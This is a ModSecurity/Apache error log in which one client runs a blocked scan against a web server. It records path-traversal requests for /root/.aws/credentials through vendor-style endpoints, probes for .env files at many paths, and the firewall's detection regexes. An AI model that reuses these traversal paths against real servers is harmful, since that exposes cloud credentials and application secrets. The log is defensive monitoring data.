[Tue May 20 02:41:23.574547 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /remote/fgt_lang?lang=/../../../../../../../../root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/remote/fgt_lang"] [unique_id "aCvPs9OGg9eDPf0DPM6HfQAAAAA"]
[Tue May 20 02:41:23.574987 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/remote/fgt_lang"] [unique_id "aCvPs9OGg9eDPf0DPM6HfQAAAAA"]
[Tue May 20 02:41:23.575188 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/remote/fgt_lang"] [unique_id "aCvPs9OGg9eDPf0DPM6HfQAAAAA"]
[Tue May 20 02:41:24.410732 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aCvPtNOGg9eDPf0DPM6HfgAAAAA"]
[Tue May 20 02:41:24.410937 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aCvPtNOGg9eDPf0DPM6HfgAAAAA"]
[Tue May 20 02:41:24.411151 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aCvPtNOGg9eDPf0DPM6HfgAAAAA"]
[Tue May 20 02:41:25.868554 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /mgmt/shared/authn/login/root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aCvPtdOGg9eDPf0DPM6HfwAAAAA"]
[Tue May 20 02:41:25.868765 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aCvPtdOGg9eDPf0DPM6HfwAAAAA"]
[Tue May 20 02:41:25.868976 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/mgmt/shared/authn/login/~../~../~../~../root/.aws/credentials"] [unique_id "aCvPtdOGg9eDPf0DPM6HfwAAAAA"]
[Tue May 20 02:41:27.122625 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /root/.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aCvPt9OGg9eDPf0DPM6HgAAAAAA"]
[Tue May 20 02:41:27.122833 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aCvPt9OGg9eDPf0DPM6HgAAAAAA"]
[Tue May 20 02:41:27.123035 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/root/.aws/credentials"] [unique_id "aCvPt9OGg9eDPf0DPM6HgAAAAAA"]
[Tue May 20 02:41:28.617058 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "46"] [id "930100"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/index.php/core/preview"] [unique_id "aCvPuNOGg9eDPf0DPM6HgQAAAAA"]
[Tue May 20 02:41:28.617128 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/index.php/core/preview"] [unique_id "aCvPuNOGg9eDPf0DPM6HgQAAAAA"]
[Tue May 20 02:41:28.617175 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Pattern match "(?:^|[\\\\/])\\\\.\\\\.(?:[\\\\/]|$)" at REQUEST_URI. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "69"] [id "930110"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI: /index.php/core/preview?file=../../../../../../../../root/.aws/credentials&x=100&y=100"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "economiasolidale.38121.it"] [uri "/index.php/core/preview"] [unique_id "aCvPuNOGg9eDPf0DPM6HgQAAAAA"]
[Tue May 20 02:41:28.617782 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/index.php/core/preview"] [unique_id "aCvPuNOGg9eDPf0DPM6HgQAAAAA"]
[Tue May 20 02:41:28.617980 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 15 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 15, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/index.php/core/preview"] [unique_id "aCvPuNOGg9eDPf0DPM6HgQAAAAA"]
[Tue May 20 02:41:29.904256 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCvPudOGg9eDPf0DPM6HggAAAAA"]
[Tue May 20 02:41:29.904476 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCvPudOGg9eDPf0DPM6HggAAAAA"]
[Tue May 20 02:41:29.904687 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aCvPudOGg9eDPf0DPM6HggAAAAA"]
[Tue May 20 02:41:31.311831 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aCvPu9OGg9eDPf0DPM6HgwAAAAA"]
[Tue May 20 02:41:31.312037 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aCvPu9OGg9eDPf0DPM6HgwAAAAA"]
[Tue May 20 02:41:31.312237 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.local"] [unique_id "aCvPu9OGg9eDPf0DPM6HgwAAAAA"]
[Tue May 20 02:41:32.390252 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aCvPvNOGg9eDPf0DPM6HhAAAAAA"]
[Tue May 20 02:41:32.390578 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aCvPvNOGg9eDPf0DPM6HhAAAAAA"]
[Tue May 20 02:41:32.390884 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.production"] [unique_id "aCvPvNOGg9eDPf0DPM6HhAAAAAA"]
[Tue May 20 02:41:38.584872 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aCvPwtOGg9eDPf0DPM6HhgAAAAA"]
[Tue May 20 02:41:38.585115 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aCvPwtOGg9eDPf0DPM6HhgAAAAA"]
[Tue May 20 02:41:38.585288 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.env"] [unique_id "aCvPwtOGg9eDPf0DPM6HhgAAAAA"]
[Tue May 20 02:41:40.206726 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aCvPxNOGg9eDPf0DPM6HhwAAAAA"]
[Tue May 20 02:41:40.206952 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aCvPxNOGg9eDPf0DPM6HhwAAAAA"]
[Tue May 20 02:41:40.207131 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aCvPxNOGg9eDPf0DPM6HhwAAAAA"]
[Tue May 20 02:41:41.544299 2025] [authz_core:error] [pid 3281132] [client 94.26.90.191:59814] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Tue May 20 02:41:42.760542 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aCvPxtOGg9eDPf0DPM6HiQAAAAA"]
[Tue May 20 02:41:42.762553 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aCvPxtOGg9eDPf0DPM6HiQAAAAA"]
[Tue May 20 02:41:42.762774 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aCvPxtOGg9eDPf0DPM6HiQAAAAA"]
[Tue May 20 02:41:44.051055 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aCvPyNOGg9eDPf0DPM6HigAAAAA"]
[Tue May 20 02:41:44.051273 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aCvPyNOGg9eDPf0DPM6HigAAAAA"]
[Tue May 20 02:41:44.051499 2025] [:error] [pid 3281132] [client 94.26.90.191:59814] [client 94.26.90.191] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aCvPyNOGg9eDPf0DPM6HigAAAAA"]
[Tue May 20 02:41:54.005913 2025] [:error] [pid 3281133] [client 94.26.90.191:38024] [client 94.26.90.191] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aCvP0rObYKFKb3Q2fU-NUQAAAAU"]
